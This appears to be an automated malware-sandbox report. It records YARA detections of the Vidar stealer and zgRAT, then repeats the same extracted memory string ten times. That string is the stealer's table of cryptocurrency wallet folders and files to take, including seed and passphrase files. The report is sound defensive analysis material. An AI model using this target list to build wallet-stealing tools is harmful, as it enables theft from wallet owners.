Source: Yara match	File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
